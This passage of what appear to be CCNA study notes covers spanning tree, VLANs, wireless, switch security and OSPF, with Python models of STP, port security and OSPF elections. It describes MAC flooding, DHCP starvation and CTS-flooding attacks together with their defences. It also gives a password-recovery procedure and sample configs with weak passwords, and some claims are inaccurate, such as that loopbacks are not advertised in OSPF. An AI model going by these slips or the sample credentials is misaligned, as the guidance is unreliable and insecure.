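    """Port ID as the switch displays it: 128.1 for F0/1 with the default priority."""
    if not is_valid_port_priority(port_priority):
        raise ValueError(f"bad port priority {port_priority}")
    return (port_priority, port_number)

def designated_port(segment, vlan: int = 1):
    """Step 3 on one segment whose root ports are already chosen: the switch with the
    lower BID wins; when one switch offers two ports, the lower port ID wins.
    `segment` is a list of (Switch, port_priority, port_number) tuples; root path
    costs are assumed equal, as in the two-switch scenario in the notes."""
    return min(segment, key=lambda e: (bridge_id(e[0], vlan), port_id(e[1], e[2])))

def with_priority(switches, name: str, priority: int):
    """Return a copy of the switch list with one switch's priority changed."""
    return [Switch(sw.name, sw.mac, priority) if sw.name == name else sw for sw in switches]

# Constructed sample topology: all three switches at the default priority,
# so the lowest MAC address, S1, wins the election.
SAMPLE_SWITCHES = [
    Switch("S1", "00:1b:0c:00:00:01"),
    Switch("S2", "00:1b:0c:00:00:02"),
    Switch("S3", "00:1b:0c:00:00:03"),
]
# S1 and S2 share one segment; S1 also offers a second port (F0/2) to it.
SAMPLE_SEGMENT = [
    (SAMPLE_SWITCHES[1], 128, 1),   # S2 F0/1 -> port ID 128.1
    (SAMPLE_SWITCHES[0], 128, 2),   # S1 F0/2 -> 128.2
    (SAMPLE_SWITCHES[0], 128, 1),   # S1 F0/1 -> 128.1 (wins: lower BID, then lower port ID)
]

if __name__ == "__main__":
    print("root with defaults:", elect_root(SAMPLE_SWITCHES).name)
    lowered = with_priority(SAMPLE_SWITCHES, "S3", 24576)   # choose the root deliberately
    print("root after S3 priority 24576:", elect_root(lowered).name)
    winner, prio, num = designated_port(SAMPLE_SEGMENT)
    print(f"designated port on the segment: {winner.name} F0/{num} ({prio}.{num})")
```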

RSTP does not have a blocking port state. RSTP defines port states as discarding, learning, or forwarding.

RSTP speeds the recalculation of the spanning tree when the Layer 2 network topology changes.

Protocol information can be immediately aged on a port if hellos are not received for three consecutive hello times, 6 seconds by default, or if the max age timer expires.

An RSTP edge port is a switch port that is never intended to be connected to another switch device. It immediately transitions to the forwarding state when enabled.

Root ports, alternate ports and backup ports do not use the link type parameter. Designated ports make the most use of link

1 designated port per segment
1 root port per switch
1 root bridge per network

Alternate port
-present on non-designated switches and will transition to a designated port if the current designated path fails

Backup port
-redundant link to the segment

RSTP significantly speeds up the recalculation process after a topology change, because it converges on a link-by-link basis and does not rely on timers expiring before ports can transition. Rapid transition to the forwarding state can only be achieved on edge ports and point-to-point links.

Do not leave it up to the STP to decide which bridge is root.

STP failure scenario
Most spanning tree algorithm failures occur due to excessive losses of BPDUs causing blocked ports to transition to forwarding mode. A broadcast storm occurs.

BPDU guard disables a PortFast-configured port or interface if the port or interface receives a BPDU.

Using the original IEEE 802.1D spanning-tree protocol involves a convergence time of up to 50 seconds. RSTP reduces convergence time to approximately 6 seconds or less.

PVST - supports ISL trunking and load balancing
PVST+ - supports BPDU guard
RSTP - incorporated into 802.1D; supports BackboneFast, UplinkFast and PortFast
Rapid PVST+ - based on IEEE 802.1w


Chap 6 Inter-VLAN routing

"Router-on-a-stick" is a type of router configuration in which a single physical interface routes traffic between multiple VLANs on a network

Subinterfaces are multiple virtual interfaces, associated with one physical interface.

These subinterfaces are configured in software on a router; each is independently configured with an IP address and VLAN assignment to operate on a specific VLAN.

Traditional routing requires routers to have multiple physical interfaces to facilitate inter-VLAN routing.

Functionally, the router-on-a-stick model for inter-VLAN routing is the same as using the traditional routing model, but instead of using the physical interfaces to perform the routing, subinterfaces of a single interface are used.

Subinterfaces require the switch port to be configured as a trunk port so that it can accept VLAN tagged traffic

To configure switch port F0/5 as a trunk port, execute the switchport mode trunk command in interface configuration mode on the F0/5 interface. You cannot use the switchport mode dynamic auto or switchport mode dynamic desirable commands because the router does not support dynamic trunking protocol.

1. verify the VLAN assignment on the switch
2. verify the switchport mode (switch --> router must be in trunk mode for subinterfaces to work)
3. wrong VLAN setting in the router (the encapsulation command)
4. IP address and subnet mask

Each interface, or subinterface, needs to be assigned an IP address that corresponds to the subnet for which it is connected


Chap 7 Wireless

You should be aware that when a standard uses OFDM, it will have faster data rates.

The ITU-R regulates the allocation of the RF spectrum and satellite orbits.

The IEEE developed and maintains the standards for local and metropolitan area networks with the IEEE 802 LAN/MAN family of standards

The Wi-Fi Alliance is an association of vendors whose objective is to improve the interoperability of products that are based on the 802.11 standard by certifying vendors for conformance to industry norms and adherence to standards.

-ITU-R regulates allocation of RF bands.
-IEEE specifies how RF is modulated to carry information.
-Wi-Fi ensures that vendors make devices that are interoperable.

An access point converts the TCP/IP data packets from their 802.11 frame encapsulation format in the air to the 802.3 Ethernet frame format on the wired Ethernet network.

Imagine two client stations that both connect to the access point, but are at opposite sides of its reach. If they are at the maximum range to reach the access point, they will not be able to reach each other. This is known as the hidden node problem.

One means of resolving the hidden node problem is a CSMA/CA feature called request to send/clear to send (RTS/CTS).

When RTS/CTS is enabled in a network, access points allocate the medium to the requesting station for as long as is required to complete the transmission.

The wireless network mode refers to the WLAN protocols: 802.11a, b, g, or n.

When a Linksys access point is configured to allow both 802.11b and 802.11g clients, it is operating in mixed mode.

A shared service set identifier (SSID) is a unique identifier that client devices use to distinguish between multiple wireless networks in the same vicinity. Several access points on a network can share an SSID

Beacons - Frames used by the WLAN network to advertise its presence. (advertised by access point)
Probes - Frames used by WLAN clients to find their networks.

The common distribution system allows multiple access points in an ESS to appear to be a single BSS.

The attacker, using a PC as an access point, can flood the BSS with clear-to-send (CTS) messages, which defeat the CSMA/CA function used by the stations. The access points, in turn, flood the BSS with simultaneous traffic, causing a constant stream of collisions.

This login process is managed by the Extensible Authentication Protocol (EAP). EAP is a framework for authenticating network access.

SSID cloaking - Disable SSID broadcasts from access points
MAC address filtering - Tables are manually constructed on the access point to allow or disallow clients based on their physical hardware address
WLAN security implementation - WPA or WPA2

Various types of PSKs are as follows:

PSK or PSK2 with TKIP is the same as WPA
PSK or PSK2 with AES is the same as WPA2
PSK2, without an encryption method specified, is the same as WPA2

Multiple access points that share a service set identifier combine to form an extended service set.

Wireless NIC - encodes a data stream onto an RF signal

Wednesday, November 4, 2009

CCNA3 Chap 1-3 Note

Chapter 1 LAN Design

In smaller networks, it is not unusual to implement a collapsed core model, where the distribution layer and core layer are combined into one layer.

Access layer switches can be configured with various port security options that provide control over which devices are allowed to connect to the network

Network diameter is the number of devices that a packet has to cross before it reaches its destination.

Link aggregation allows multiple switch port links to be combined so as to achieve higher throughput between switches.

Convergence is the process of combining voice and video communications on a data network.

User community analysis is the process of identifying various groupings of users and their impact on network performance.

Modular switches typically come with different sized chassis that allow for the installation of different numbers of modular line cards.

StackWise allows you to interconnect up to nine switches using fully redundant backplane connections.

Stackable switches are desirable where fault tolerance and bandwidth availability are critical and a modular switch is too costly to implement.

Forwarding rates define the processing capabilities of a switch by rating how much data the switch can process per second.

Link aggregation helps to reduce these bottlenecks of traffic by allowing up to eight switch ports to be bound together for data communications, providing up to 8 Gb/s of data throughput when Gigabit Ethernet ports are used.

Power over Ethernet (PoE) allows the switch to deliver power to a device over the existing Ethernet cabling.

Layer 3 switches are also known as multilayer switches.

PoE dramatically increases the overall price of the switch across all Cisco Catalyst switch product lines, so it should only be considered when voice convergence is required or wireless access points are being implemented, and power is difficult or expensive to run to the desired location.

Distribution layer switches are typically implemented in pairs to ensure availability. It is also recommended that distribution layer switches support multiple, hot-swappable power supplies. Having more than one power supply allows the switch to continue operating even if one of the power supplies fails during operation.


Chap 2 Basic switch


collision --> detect increase amplitude --> jamming signal --> backoff algorithm invoked -->stop transmitting for random time

An Ethernet MAC address is a two-part 48-bit binary value expressed as 12 hexadecimal digits. The address format looks like 00-05-9A-3C-78-00.

auto - autonegotiation
full - full duplex
half - half duplex

For Fast Ethernet and 10/100/1000 ports, the default is auto. For 100BASE-FX ports, the default is full.

Instead, you can now use the mdix auto interface configuration command in the CLI to enable the automatic medium-dependent interface crossover (auto-MDIX) feature.

For example, if a 12-port switch has a device connected to each port, 12 collision domains are created.

Since Layer 2 data is present earlier in the frame structure than the Layer 3 data, switches can process the frame more quickly.

Even though the LAN switch reduces the size of collision domains, all hosts connected to the switch are still in the same broadcast domain.

The use of higher layer devices can also increase latency on a network.

Cut-through switching
1. Because the switch does not have to wait for the entire frame to be completely buffered, and because the switch does not perform any error checking, cut-through switching is faster than store-and-forward switching.
2. Fragment-free switching: the switch stores the first 64 bytes of the frame before forwarding it. This is a compromise between the high latency and high integrity of store-and-forward switching and the low latency of plain cut-through switching.

Asymmetric switching enables more bandwidth to be dedicated to a server switch port to prevent a bottleneck. - smoother network
-memory buffering

Routers are also capable of performing packet forwarding tasks not found on Layer 3 switches, such as establishing remote access connections to remote networks and devices.

AAA and TACACS are authentication protocols that can be used in networks to validate user credentials.

You can change the aging time setting for MAC addresses. The default time is 300 seconds.

To create a static mapping in the MAC address table, use the mac-address-table static vlan {1-4096, ALL} interface interface-id command.

If you want to remove the requirement to store all system passwords in an encrypted format, enter the no service password-encryption command from global configuration mode. Removing password encryption does not convert currently encrypted passwords back into readable text. However, all newly set passwords are stored in clear text format.

enable password recovery
-dir flash
-rename flash:config.text flash:config.text.old
-rename flash:config.text.old flash:config.text
-copy flash:config.text system:running-config
-configure terminal
-enable secret password
-copy running-config startup-config

The MOTD banner displays on all connected terminals at login and is useful for sending messages that affect all network users (such as impending system shutdowns). The MOTD banner displays before the login banner if it is configured.

To delete the RSA key pair, use the crypto key zeroize rsa global configuration command. After the RSA key pair is deleted, the SSH server is automatically disabled.

By default, up to five simultaneous, encrypted SSH connections for multiple CLI-based sessions over the network are available (session 0 to session 4).

The CLI-based session time-out value returns to the default of 10 minutes.

Specify the number of times that a client can re-authenticate to the server. The default is 3.

//MAC flooding
MAC flooding can be performed using a network attack tool. The network intruder uses the attack tool to flood the switch with a large number of invalid source MAC addresses until the MAC address table fills up.

When the MAC address table is full, the switch floods all ports with incoming traffic because it cannot find the port number for a particular MAC address in the MAC address table. The switch, in essence, acts like a hub.

//DHCP starvation attack
A DHCP starvation attack causes all of the leases on the real DHCP server to be allocated, thus preventing the real users (DHCP clients) from obtaining an IP address.

To prevent DHCP attacks, use DHCP snooping.
Ports are identified as trusted and untrusted. Trusted ports can source all DHCP messages; untrusted ports can source requests only. Trusted ports host a DHCP server or can be an uplink toward the DHCP server. If a rogue device on an untrusted port attempts to send a DHCP response packet into the network, the port is shut down.

Static secure MAC addresses
Dynamic secure MAC addresses
Sticky secure MAC addresses

If you save the sticky secure MAC addresses in the configuration file, when the switch restarts or the interface shuts down, the interface does not need to relearn these addresses. If you do not save the sticky secure addresses, they are lost.

security violation modes
protect - drop packet, no notification
restrict - drop packet, notification sent
shutdown - turn off port, default mode
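To make the port-security notes above concrete, here is an added Python model (not Cisco code and not from the original notes) of a MAC address table with limited capacity and of a secured port with the three violation modes and sticky/static address persistence across a reload. The simplified semantics are an assumption and every MAC address is a constructed sample value.

```python
"""Added example, not from the original notes: a toy model of a switch MAC address
table and of port security with the three violation modes. The simplified semantics
are an assumption, and every MAC address used here is a constructed sample value."""
from dataclasses import dataclass, field


@dataclass
class SecurePort:
    """An access port with 'switchport port-security' enabled."""
    name: str
    maximum: int = 1               # switchport port-security maximum <n> (default 1)
    violation: str = "shutdown"    # protect | restrict | shutdown (the default)
    sticky: bool = False           # switchport port-security mac-address sticky
    secure_macs: set = field(default_factory=set)   # addresses currently secured
    static_macs: set = field(default_factory=set)   # addresses configured statically
    err_disabled: bool = False
    notifications: list = field(default_factory=list)

    def add_static(self, mac: str) -> None:
        """switchport port-security mac-address <mac>: always kept in the config."""
        self.static_macs.add(mac.lower())
        self.secure_macs.add(mac.lower())

    def check_source(self, src_mac: str) -> str:
        """Decide what the port does with a frame from src_mac:
        'forward', 'drop' (protect/restrict) or 'err-disabled' (shutdown)."""
        if self.err_disabled:
            return "err-disabled"          # port stays down until an admin re-enables it
        mac = src_mac.lower()
        if mac in self.secure_macs:
            return "forward"
        if len(self.secure_macs) < self.maximum:
            self.secure_macs.add(mac)      # learned dynamically (or sticky)
            return "forward"
        # The limit is exceeded: this is a security violation.
        if self.violation == "protect":    # drop, no notification
            return "drop"
        if self.violation == "restrict":   # drop, notification sent
            self.notifications.append(f"violation on {self.name} by {mac}")
            return "drop"
        self.err_disabled = True           # shutdown: port goes err-disabled
        self.notifications.append(f"{self.name} err-disabled by {mac}")
        return "err-disabled"

    def saved_addresses(self) -> set:
        """What 'copy running-config startup-config' preserves: static addresses
        always, learned ones only when they were learned as sticky addresses."""
        return set(self.secure_macs) if self.sticky else set(self.static_macs)

    def reload(self, saved: set) -> None:
        """Switch restart: only saved addresses come back, the rest must be relearned."""
        self.secure_macs = set(saved)
        self.err_disabled = False


class MacTable:
    """A CAM table of fixed capacity; once full, unknown destinations are flooded."""

    def __init__(self, capacity: int):
        self.capacity = capacity
        self.entries: dict = {}            # source MAC -> port it was learned on

    def learn(self, mac: str, port: str) -> bool:
        mac = mac.lower()
        if mac in self.entries or len(self.entries) < self.capacity:
            self.entries[mac] = port
            return True
        return False                       # table full: address cannot be learned

    def forward(self, dst_mac: str) -> str:
        """Egress port for a destination, or 'flood' when it is unknown (hub behaviour)."""
        return self.entries.get(dst_mac.lower(), "flood")


def switch_frame(table: MacTable, port: SecurePort, src_mac: str, dst_mac: str) -> str:
    """Port security runs first, so only secured source addresses ever reach the table."""
    decision = port.check_source(src_mac)
    if decision != "forward":
        return decision
    table.learn(src_mac, port.name)
    return table.forward(dst_mac)


if __name__ == "__main__":
    table = MacTable(capacity=4)
    fa1 = SecurePort("Fa0/1", maximum=1, violation="restrict")
    print(switch_frame(table, fa1, "00-05-9A-3C-78-00", "00-05-9A-3C-78-99"))  # flood
    print(switch_frame(table, fa1, "00-05-9A-3C-78-01", "00-05-9A-3C-78-99"))  # drop
    print(fa1.notifications)
```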


Chap 3 - VLANs

A VLAN is a logically separate IP subnetwork. VLANs allow multiple IP networks and subnets to exist on the same switched network.

All switch ports become a member of the default VLAN after the initial boot up of the switch.

The Scavenger class is intended to provide less-than best-effort services to certain applications. These include peer-to-peer media-sharing applications and gaming.

A dynamic port VLAN membership is configured using a special server called a VLAN Membership Policy Server (VMPS). With the VMPS, you assign switch ports to VLANs dynamically, based on the source MAC address of the device connected to the port.

The configuration command mls qos trust cos ensures that voice traffic is identified as priority traffic.

switchport voice vlan 150

The default VLAN for Cisco switches is VLAN 1. VLAN 1 has all the features of any VLAN, except that you cannot rename it and you cannot delete it.

It is a security best practice to change the default VLAN to a VLAN other than VLAN 1.

A native VLAN is assigned to an 802.1Q trunk port. An 802.1Q trunk port supports traffic coming from many VLANs (tagged traffic) as well as traffic that does not come from a VLAN (untagged traffic).

An SVI is a logical interface configured for a specific VLAN. By default, an SVI is created for the default VLAN (VLAN 1) to permit remote switch administration. You need to configure an SVI for a VLAN if you want to route between VLANs.

A trunk is a point-to-point link between one or more Ethernet switch interfaces and another networking device, such as a router or a switch.

Dynamic Trunking Protocol (DTP) is a Cisco proprietary protocol.

DTP manages trunk negotiation only if the port on the other switch is configured in a trunk mode that supports DTP.

Trunking modes
-Trunk (on)
switchport mode trunk
-Dynamic auto
switchport mode dynamic auto
-Dynamic desirable
switchport mode dynamic desirable
-Turn off DTP
switchport nonegotiate

Note: Before deleting a VLAN, be sure to first reassign all member ports to a different VLAN. Any ports that are not moved to an active VLAN are unable to communicate with other stations after you delete the VLAN.

Alternatively, the entire vlan.dat file can be deleted using the command delete flash:vlan.dat from privileged EXEC mode. After the switch is reloaded, the previously configured VLANs will no longer be present.

Common problems with trunks
-native VLAN mismatches
the native VLAN is set differently on the two ends
-trunk mode mismatches
ex. dynamic auto + dynamic auto = access (no trunk is formed)
-allowed VLANs on trunks

VLANs are used to segment broadcast domains in a switched LAN. This improves the performance and manageability of LANs. VLANs provide network administrators flexible control over traffic associated with devices in the LAN.

Routers or Layer 3 switches are required for inter-VLAN communication.

IEEE 802.1Q is the standard trunking protocol. It does not tag native VLAN traffic, which can result in problems when trunking is misconfigured.

One IP subnet to one VLAN

Thursday, October 22, 2009

CCNA2 Cisco command

Router#erase startup-config
Router#debug ip routing
Router#debug ip rip
Router#undebug all

Router(config)# hostname R1
Router(config)# enable secret 1234password
Router(config)# banner motd &

!! Authorised ACCESS ONLY!

R1(config)#line console 0
R1(config-line)#password 123
R1(config-line)#logging synchronous
R1(config-line)#exec-timeout 0 0

R1(config)#line vty 0 4
R1(config-line)#password 123
R1(config-line)#logging synchronous
R1(config-line)#exec-timeout 0 0

//Disable domain lookup
R1(config)#no ip domain-lookup

//Clock rate set at DCE
Router(config)#interface serial 1/1
Router(config-if)#ip address
Router(config-if)#no ip address
Router(config-if)# clock rate 64000
Router(config-if)#no shutdown

//Static routes need to be set on both routers
Router(config)#ip route

//Default route
Router(config)# ip route Next_Hop_Add
Router(config)# ip route serial 1/1
Router#show interface serial 1/1

Router(config)#router rip

//prevent updates from being sent out FE 0/0, saves bandwidth
Router(config-router)#passive-interface fastethernet 0/0

//configure the router to include the static route in its RIP updates
Router(config-router)#default-information originate
Router#show ip protocols

Router#show running-config
Router#copy running-config startup-config
Router#show startup-config

Router# show interface
Router#show ip protocols
Router#show ip route
Router#show ip interface brief

Router(config)#cdp run
Router(config)#int ethernet 0/1
Router(config-if)#cdp enable
Router(config-if)#no cdp enable
Router(config)#no cdp run

R1(config)#router ospf 1

Router(config-router)#network network-address wildcard-mask area area-id
Router(config-router)#network area 0

Router(config-router)#router-id ip-address
Router#clear ip ospf process // apply a modified router ID, OR reload the router

Router(config)#interface loopback number
Router(config-if)#ip address ip-address subnet-mask

Router(config)#interface loopback 0
Router(config-if)#ip address


Router(config-if)#bandwidth bandwidth-kbps
Router(config-if)#bandwidth 56


Router(config-if)#ip ospf cost 1562 //bypass the calculation and input the value directly


Router(config-if)#ip ospf priority {0 - 255} //to set the DR or BDR

Router(config-if)#ip ospf hello-interval seconds
Router(config-if)#ip ospf dead-interval seconds

R1(config)#ip route loopback 1 //default route

R1(config-router)#auto-cost reference-bandwidth ? //1-4294967 The reference bandwidth in terms of Mbits per second

R1(config-router)#auto-cost reference-bandwidth 10000

R1#show ip protocols
R1#show ip ospf neighbor
R1#show ip ospf
R1#show ip ospf interface serial 0/0/0

Wednesday, October 21, 2009

Tuesday, October 20, 2009

CCNA2 Chapter 10-11 note

Chap 10 Link state protocol

The IP link-state routing protocols are shown in the figure:
Open Shortest Path First (OSPF)
Intermediate System-to-Intermediate System (IS-IS)

Basic OSPF operations can be configured with a router ospf process-id command and a network statement.

Each router floods the LSP to all neighbors, who then store all LSPs received in a database.

Each router learns about its own links, its own directly connected networks.

The interface must be properly configured with an IP address and subnet mask, and the link must be in the up state.

An LSP only needs to be sent:
During initial startup of the router or of the routing protocol process on that router
Whenever there is a change in the topology, including a link going down or coming up, or a neighbor adjacency being established or broken

Note: The actual SPF algorithm determines the shortest path as it is building the SPF tree.

Note: OSPF routers do flood their own link-states every 30 minutes. This is known as a paranoid update and is discussed in the following chapter. Also, not all distance vector routing protocols send periodic updates. RIP and IGRP send periodic updates; however, EIGRP does not.

When there is a change in the topology, only those routers in the affected area receive the LSP and run the SPF algorithm.

Link-state routing protocols typically require more memory, more CPU processing, and at times more bandwidth than distance vector routing protocols.

1. Each router learns about its own directly connected networks.

2. Each router is responsible for "saying hello" to its neighbors on directly connected networks.

3. Each router builds a Link-State Packet (LSP) containing the state of each directly connected link.

4. Each router floods the LSP to all neighbors, who then store all LSPs received in a database.

5. Each router uses the database to construct a complete map of the topology and computes the best path to each destination network.

Each router determines its own link-states and floods the information to all other routers in the area. As a result, each router builds a link-state database (LSDB) containing the link-state information from all other routers. Each router will have identical LSDBs. Using the information in the LSDB, each router will run the SPF algorithm. The SPF algorithm will create an SPF tree, with the router at the root of the tree. As each link is connected to other links, the SPF tree is created. Once the SPF tree is completed, the router can determine on its own the best path to each network in the tree.

Link-state routing protocols converge faster (EIGRP is an exception).


Chapter 11 OSPF

By default, OSPF Hello packets are sent every 10 seconds on multiaccess and point-to-point segments and every 30 seconds on non-broadcast multiaccess (NBMA) segments (Frame Relay, X.25, ATM).

In most cases, OSPF Hello packets are sent as multicast to an address reserved for ALLSPFRouters at

The Dead interval is the period, expressed in seconds, that the router will wait to receive a Hello packet before declaring the neighbor "down." Cisco uses a default of four times the Hello interval. For multiaccess and point-to-point segments, this period is 40 seconds. For NBMA networks, the Dead interval is 120 seconds.

To reduce the amount of OSPF traffic on multiaccess networks, OSPF elects a Designated Router (DR) and Backup Designated Router (BDR).

An LSU contains one or more LSAs and either term can be used to refer to link-state information propagated by OSPF routers.

OSPF is enabled with the router ospf process-id global configuration command. The process-id is a number between 1 and 65535 and is chosen by the network administrator. The process-id is locally significant, which means that it does not have to match other OSPF routers in order to establish adjacencies with those neighbors. This differs from EIGRP. The EIGRP process ID or autonomous system number does need to match for two EIGRP neighbors to become adjacent.

R1(config)#router ospf 1

Router(config-router)#network network-address wildcard-mask area area-id

#network area 0

Unlike EIGRP, however, OSPF requires the wildcard mask.

Although any area-id can be used, it is good practice to use an area-id of 0 with single-area OSPF.

The OSPF router ID is used to uniquely identify each router in the OSPF routing domain. A router ID is simply an IP address. Cisco routers derive the router ID based on three criteria and with the following precedence:

1. Use the IP address configured with the OSPF router-id command.

2. If the router-id is not configured, the router chooses highest IP address of any of its loopback interfaces.

3. If no loopback interfaces are configured, the router chooses highest active IP address of any of its physical interfaces.

R3:, which is higher than either or

One command you can use to verify the current router ID is show ip protocols.

Router(config)#interface loopback number
Router(config-if)#ip address ip-address subnet-mask

Router(config)#interface loopback 0
Router(config-if)#ip add

The advantage of using a loopback interface is that - unlike physical interfaces - it cannot fail. There are no actual cables or adjacent devices on which the loopback interface depends for being in the up state.

Router(config)#router ospf process-id

Modifying the Router ID

The router ID is selected when OSPF is configured with its first OSPF network command. If the OSPF router-id command or the loopback address is configured after the OSPF network command, the router ID will be derived from the interface with the highest active IP address.

The router ID can be modified with the IP address from a subsequent OSPF router-id command by reloading the router or by using the following command:

Router#clear ip ospf process

R1#show ip ospf neighbor
This command can be used to verify that the router has formed an adjacency with its neighboring routers.

Two routers may not form an OSPF adjacency if:
The subnet masks do not match, causing the routers to be on separate networks.
OSPF Hello or Dead Timers do not match.
OSPF Network Types do not match.
There is a missing or incorrect OSPF network command.

The SPF algorithm is CPU-intensive and the time it takes for calculation depends on the size of the area. The size of an area is measured by the number of routers and the size of the link-state database.

A network that cycles between an up state and a down state is referred to as a flapping link. A flapping link can cause OSPF routers in an area to constantly recalculate the SPF algorithm, preventing proper convergence. To minimize this problem, the router waits 5 seconds (5000 msecs) after receiving an LSU before running the SPF algorithm. This is known as the SPF schedule delay. In order to prevent a router from constantly running the SPF algorithm, there is an additional Hold Time of 10 seconds (10000 msecs). The router waits 10 seconds after running the SPF algorithm before rerunning the algorithm again.

#show ip protocols
#show ip ospf
#show ip ospf interface serial 0/0/0

OSPF may have different Hello and Dead intervals on various interfaces, but for OSPF routers to become neighbors, their OSPF Hello and Dead intervals must be identical. For example, in the figure, R1 is using a Hello interval of 10 and a Dead interval of 40 on the Serial 0/0/0 interface. R2 must also use the same intervals on its Serial 0/0/0 interface or the two routers will not form an adjacency.

Unlike RIPv2 and EIGRP, OSPF does not automatically summarize at major network boundaries.

Loopback interfaces count as directly connected networks; they are not advertised in OSPF.

OSPF metric
The reference bandwidth defaults to 10 to the 8th power, 100,000,000 bps or 100 Mbps. This results in interfaces with a bandwidth of 100 Mbps and higher having the same OSPF cost of 1. The reference bandwidth can be modified to accommodate networks with links faster than 100,000,000 bps (100 Mbps) using the OSPF command auto-cost reference-bandwidth.

The cost of an OSPF route is the accumulated value from one router to the destination network.

On Cisco routers, the bandwidth value on many serial interfaces defaults to T1 (1.544 Mbps). However, some serial interfaces may default to 128 kbps.

Never assume that OSPF is using any particular bandwidth value. Always check the default value with the show interface command.

Use the show interface command to view the bandwidth value used for an interface.

Router(config-if)#bandwidth bandwidth-kbps

The figure shows the bandwidth commands used to modify the costs of all the serial interfaces in the topology.


R1(config-if)#ip ospf cost 1562

The main difference between the two commands is that the bandwidth command uses the result of the cost calculation to determine the cost of the link. The ip ospf cost command bypasses this calculation by directly setting the cost of the link to a specific value.
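The cost calculation above and the SPF tree described in chapter 10 are shown together in this added Python example (not from the original notes): interface costs are derived from the reference bandwidth or set directly, every router gets the same LSDB, and Dijkstra's SPF accumulates the outgoing interface costs to each destination. The router names, link bandwidths and the LSDB representation are constructed assumptions.

```python
"""Added example, not from the original notes, serving two passages: the SPF tree each
router builds from the shared LSDB (chapter 10) and the OSPF cost calculation from the
reference bandwidth (chapter 11). The topology, link bandwidths and router names are
constructed samples; the LSDB representation is a simplification."""
import heapq
from math import inf


def ospf_cost(bandwidth_kbps: int, reference_mbps: int = 100) -> int:
    """Cost = reference bandwidth / interface bandwidth, truncated, never below 1.
    reference_mbps is the value given to 'auto-cost reference-bandwidth' (default 100,
    i.e. 10^8 bps), so every link of 100 Mbps or faster costs 1 unless it is raised."""
    reference_bps = reference_mbps * 1_000_000
    return max(1, reference_bps // (bandwidth_kbps * 1000))


def interface_cost(bandwidth_kbps: int, reference_mbps: int = 100, ip_ospf_cost=None) -> int:
    """'bandwidth' only feeds the calculation; 'ip ospf cost' bypasses it entirely."""
    if ip_ospf_cost is not None:
        return ip_ospf_cost
    return ospf_cost(bandwidth_kbps, reference_mbps)


def build_lsdb(links, reference_mbps: int = 100, overrides=None) -> dict:
    """links: [(router_a, router_b, bandwidth_kbps)] for point-to-point links.
    overrides: {(router, neighbour): cost} for interfaces with 'ip ospf cost'.
    Because every router floods its link-states to all others, every router in the
    area ends up with this identical LSDB: {router: {neighbour: outgoing cost}}."""
    overrides = overrides or {}
    lsdb = {}
    for a, b, bw in links:
        for src, dst in ((a, b), (b, a)):
            cost = interface_cost(bw, reference_mbps, overrides.get((src, dst)))
            lsdb.setdefault(src, {})[dst] = cost
    return lsdb


def spf(lsdb: dict, root: str) -> dict:
    """Dijkstra's shortest path first with `root` at the root of the tree.
    Returns {router: (accumulated cost, first hop)}; the accumulated cost is the
    sum of the outgoing interface costs along the path, i.e. the OSPF route metric."""
    dist = {root: 0}
    first_hop = {root: None}
    heap = [(0, root, None)]
    while heap:
        d, node, hop = heapq.heappop(heap)
        if d > dist.get(node, inf):
            continue                      # stale heap entry, a shorter path was found
        for nbr, cost in lsdb.get(node, {}).items():
            nd = d + cost
            if nd < dist.get(nbr, inf):
                dist[nbr] = nd
                first_hop[nbr] = hop or nbr
                heapq.heappush(heap, (nd, nbr, hop or nbr))
    return {r: (dist[r], first_hop[r]) for r in dist}


if __name__ == "__main__":
    # Constructed topology: two T1 serial links and one slow 64 kbps link.
    links = [("R1", "R2", 1544), ("R2", "R3", 1544), ("R1", "R3", 64)]
    for reference in (100, 10000):
        tree = spf(build_lsdb(links, reference), "R1")
        print(f"reference-bandwidth {reference}: {tree}")
```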

Multiaccess networks can create two challenges for OSPF regarding the flooding of LSAs:

1. Creation of multiple adjacencies, one adjacency for every pair of routers.

2. Extensive flooding of LSAs (Link-State Advertisements).

The solution to managing the number of adjacencies and the flooding of LSAs on a multiaccess network is the Designated Router (DR).

DROthers only send their LSAs to the DR and BDR using the multicast address (ALLDRouters - All DR routers).

The end result is that there is only one router doing all of the flooding of all LSAs in the multiaccess network.

How do the DR and BDR get elected? The following criteria are applied:

1. DR: Router with the highest OSPF interface priority.

2. BDR: Router with the second highest OSPF interface priority.

3. If OSPF interface priorities are equal, the highest router ID is used to break the tie.

When two DROther routers form a neighbor adjacency, the neighbor state is displayed as 2WAY.

The DR and BDR election process takes place as soon as the first router with an OSPF enabled interface is active on the multiaccess network. This can happen when the routers are powered-on or when the OSPF network command for that interface is configured.

If a new router enters the network after the DR and BDR have been elected, it will not become the DR or the BDR even if it has a higher OSPF interface priority or router ID than the current DR or BDR. The current DR and BDR must both fail before the new router can be elected DR or BDR.

A previous DR does not regain DR status if it returns to the network.

So, how do you make sure that the routers you want to be DR and BDR win the election? Without further configurations, the solution is to either:
Boot up the DR first, followed by the BDR, and then boot all other routers, or
Shut down the interface on all routers, followed by a no shutdown on the DR, then the BDR, and then all other routers.

Instead of relying on the router ID to decide which routers are elected the DR and BDR, it is better to control the election of these routers with the ip ospf priority interface command.

Router(config-if)#ip ospf priority {0 - 255}

But if you change the default value from 1 to a higher value, the router with the highest priority will become the DR and the router with the next highest priority will become the BDR. A value of 0 makes the router ineligible to become a DR or BDR.
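The router-ID precedence and the DR/BDR election rules above are modelled in this added Python example (not from the original notes): a router ID comes from the router-id command, else the highest loopback, else the highest active physical address, and an election honours priority, then router ID, never pre-empting a live DR or BDR. Router names, addresses and priorities are constructed samples and the election logic is a simplification.

```python
"""Added example, not from the original notes: how a Cisco router derives its OSPF
router ID (router-id command, then highest loopback, then highest active physical
address) and a simplified model of the DR/BDR election and its no-pre-emption rule.
Router names, addresses and priorities are constructed samples."""
from dataclasses import dataclass, field
from ipaddress import IPv4Address
from typing import List, Optional, Tuple


@dataclass
class Router:
    name: str
    priority: int = 1                          # ip ospf priority: default 1, 0 = ineligible
    router_id_cmd: Optional[str] = None        # 'router-id' command, highest precedence
    loopbacks: List[str] = field(default_factory=list)     # loopback interface addresses
    physical_up: List[str] = field(default_factory=list)   # active physical interface addresses

    @property
    def router_id(self) -> IPv4Address:
        if self.router_id_cmd:
            return IPv4Address(self.router_id_cmd)
        if self.loopbacks:
            return max(IPv4Address(a) for a in self.loopbacks)
        if self.physical_up:
            return max(IPv4Address(a) for a in self.physical_up)
        raise ValueError(f"{self.name}: no IP address to derive a router ID from")


def elect(routers: List[Router], current_dr: Optional[str] = None,
          current_bdr: Optional[str] = None) -> Tuple[Optional[str], Optional[str]]:
    """Return (DR, BDR) names for the routers currently active on the segment.
    Highest priority wins, the highest router ID breaks ties, priority 0 never runs.
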